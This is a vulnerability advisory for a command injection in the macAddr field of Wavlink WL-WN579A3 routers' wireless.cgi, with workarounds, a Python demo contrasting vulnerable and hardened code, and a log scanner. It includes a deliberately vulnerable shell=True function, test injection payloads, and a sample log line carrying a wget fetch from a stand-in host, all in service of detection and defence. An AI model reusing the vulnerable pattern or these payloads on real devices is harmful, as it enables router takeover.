CVE-2026-2530

6.3 MEDIUM

📋 TL;DR

This vulnerability lets a remote attacker execute arbitrary OS commands on Wavlink WL-WN579A3 devices through a command injection in the AddMac function behind the /cgi-bin/wireless.cgi endpoint. The macAddr parameter is handed to a shell without validation, so shell metacharacters in it (; | ` and similar) turn a MAC-address field into a command runner. Every device on an affected firmware build (up to 20210219) is at risk in its default configuration.
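The injection pattern described above, as an added Python illustration that is not Wavlink's code (the real AddMac handler is native CGI code whose source is not on this page): the parameter is spliced into a shell command string, beside the hardened form that checks the value against a MAC allow-list and passes an argument vector so no shell ever parses it. The command `echo mac-filter add` stands in for whatever binary the firmware actually invokes; that, and the function names, are assumptions for the demo.

```python
import re
import subprocess

# Strict allow-list: six hex octets separated by ':' is the only shape a MAC filter needs
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")


def vulnerable_add_mac(mac_addr: str) -> str:
    """Unsafe pattern: the request parameter is concatenated into a command string
    that /bin/sh parses. Anything after ';', '|', '`' or '$(' becomes a second command.
    'echo mac-filter add' is an assumed stand-in for the firmware's real tool."""
    cmd = "echo mac-filter add " + mac_addr
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_add_mac(mac_addr: str) -> str:
    """Safe pattern: reject anything that is not a MAC address, then run the tool
    with an argv list. No shell is involved, so metacharacters can never be interpreted."""
    if not MAC_RE.fullmatch(mac_addr):
        raise ValueError("macAddr must look like 00:11:22:33:44:55")
    argv = ["echo", "mac-filter", "add", mac_addr]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "00:11:22:33:44:55; echo INJECTED"   # constructed test input
    print(vulnerable_add_mac(payload))             # the second command runs
    try:
        hardened_add_mac(payload)
    except ValueError as e:
        print("rejected:", e)
```

The allow-list is the important half: even with an argv list, a value the downstream tool does not expect can still misbehave, so validate the shape first and only then pass it on.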

💻 Affected Systems

Products:
  • Wavlink WL-WN579A3
Versions: Up to 20210219
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the web management interface accessible via HTTP/HTTPS. Default configurations are vulnerable.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing persistent backdoor installation, network traffic interception, lateral movement to connected devices, and botnet recruitment.

🟠

Likely Case

Router takeover enabling DNS hijacking, credential theft from network traffic, and deployment of malware to connected devices.

🟢

If Mitigated

Limited impact with proper network segmentation, firewall rules blocking WAN access to management interfaces, and regular firmware updates.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code is available on GitHub. The reported exploit is a single crafted HTTP request to /cgi-bin/wireless.cgi with shell metacharacters in the macAddr parameter and, per this report, needs no authentication. Note that a 6.3 MEDIUM score is lower than an unauthenticated remote code execution would normally receive; check the CVSS vector on the NVD entry before deciding how to prioritise.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch is available and the vendor did not respond to disclosure. Either replace the device or apply the workarounds below, and keep the management interface off the internet until then.

🔧 Temporary Workarounds

Block WAN Access to Management Interface

linux

Drop management traffic (ports 80/443) arriving on the WAN interface only, so LAN administration keeps working; the rules below as originally written would also have locked out LAN clients. The interface name is an assumption, check it with `ip link` or the vendor UI. Rules added this way do not survive a reboot unless placed in the device's startup scripts. If the web UI has a remote management toggle, turning it off achieves the same without shell access.

WAN_IF=eth0   # assumed; replace with the device's actual WAN interface
iptables -I INPUT -i "$WAN_IF" -p tcp --dport 80 -j DROP
iptables -I INPUT -i "$WAN_IF" -p tcp --dport 443 -j DROP

Disable CGI Wireless Management

linux

Rename the vulnerable /cgi-bin/wireless.cgi handler so the web server no longer serves it. This needs a root shell on the device (telnet, SSH or serial), the /www path is an assumption, and on many such devices the web root lives on a read-only squashfs, so the rename fails and would not survive a reboot anyway. It also removes all wireless management from the UI, so treat it as a last resort.

mv /www/cgi-bin/wireless.cgi /www/cgi-bin/wireless.cgi.disabled

🧯 If You Can't Patch

  • Isolate affected routers in separate VLAN with strict firewall rules
  • Implement network monitoring for unusual outbound connections from routers

🔍 How to Verify

Check if Vulnerable:

Read the firmware version from the web interface at System Status > Firmware Version. Any build dated 20210219 or earlier is affected; no fixed build has been published.

Check Version:

curl -s http://<router-ip>/ | grep -i firmware

The landing page is usually a login form and may not embed the version string; if grep prints nothing, log in and read System Status instead.

Verify Fix Applied:

There is no vendor fix to verify, so confirm the workaround instead: from a host outside the network, a connection to the router's management port should time out or be refused; from the LAN, /cgi-bin/wireless.cgi should return an error if it was disabled. If you probe the endpoint itself, do so only on devices you own, with a harmless, non-destructive payload, and treat any sign that shell metacharacters in macAddr change the response as confirmation that the device is still exposed.

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests to /cgi-bin/wireless.cgi whose macAddr value contains shell metacharacters (; | & ` $( ), raw or URL-encoded (%3B, %7C, %60), or that is not a six-octet MAC address at all
  • Unexpected process launches (shells, wget/curl, netcat) in any syslog the router forwards; consumer routers keep little or no local log, so forward syslog to a collector if the device supports it

Network Indicators:

  • Unusual outbound connections from router IP
  • DNS queries to suspicious domains from router

SIEM Query:

source="router-logs" AND uri="/cgi-bin/wireless.cgi" AND (macAddr="*;*" OR macAddr="*|*" OR macAddr="*`*" OR macAddr="*%3B*" OR macAddr="*%7C*" OR macAddr="*%60*")

Wildcards on raw metacharacters miss URL-encoded forms, which is why the encoded variants are included. The more robust rule is to percent-decode the field first and alert on any macAddr that is not exactly six hex octets separated by colons, since a legitimate MAC filter entry never needs anything else.
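The detection logic above, run over sample access-log lines, as an added example that is neither the page's SIEM query nor anything from Wavlink; it also covers the macAddr log indicator listed above. The log lines are constructed for the demo using documentation address ranges, and the parser assumes a Common Log Format line with the request in quotes, since the device's real log format is not documented here. Decoding the query string before matching is what catches `%3B` and `%60`, which a wildcard on the raw field would miss.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/cgi-bin/wireless.cgi"
# Allow-list: six hex octets separated by ':' or '-' is the only legitimate shape
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([:-][0-9A-Fa-f]{2}){5}$")
# Characters that let a shell start a second command or substitute output
METACHARS = re.compile(r"[;|&`$(){}<>\n]")
# Common Log Format request line: client, ident, user, [timestamp], "METHOD URI ..."
CLF_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)')

# Constructed sample log lines (not real device logs); RFC 5737 documentation addresses
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2026:10:01:02 +0000] "POST /cgi-bin/wireless.cgi?macAddr=00:11:22:33:44:55 HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2026:10:02:15 +0000] "POST /cgi-bin/wireless.cgi?macAddr=00:11:22:33:44:55%3Bwget%20http://203.0.113.5/x HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Mar/2026:10:03:40 +0000] "GET /cgi-bin/wireless.cgi?macAddr=aa:bb:cc:dd:ee HTTP/1.1" 200 100',
    '192.0.2.12 - - [12/Mar/2026:10:04:01 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '198.51.100.7 - - [12/Mar/2026:10:05:33 +0000] "GET /cgi-bin/wireless.cgi?macAddr=%60id%60 HTTP/1.1" 200 512',
]


def classify_macaddr(value: str) -> Optional[str]:
    """Return a reason if the (already percent-decoded) value is suspicious, else None."""
    if METACHARS.search(value):
        return "shell metacharacter in macAddr"
    if not MAC_RE.fullmatch(value):
        return "macAddr is not a MAC address"
    return None


def scan(lines):
    """Return (src_ip, timestamp, reason, decoded_value) for each suspicious wireless.cgi request."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["uri"])
        if url.path != TARGET_PATH:
            continue
        # parse_qs percent-decodes, so %3B / %7C / %60 surface as ; | ` before matching
        for value in parse_qs(url.query).get("macAddr", []):
            reason = classify_macaddr(value)
            if reason:
                findings.append((m["src"], m["ts"], reason, value))
    return findings


if __name__ == "__main__":
    for src, ts, reason, value in scan(SAMPLE_LOG):
        print(f"{ts} {src} {reason}: {value!r}")
```

Only the query string is visible to an access log; if the device posts macAddr in the request body, the same classifier has to run on a proxy or IDS that captures bodies. Flagging "not a MAC address" as well as metacharacters is deliberate: it catches encodings and tricks the metacharacter list does not anticipate.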

🔗 References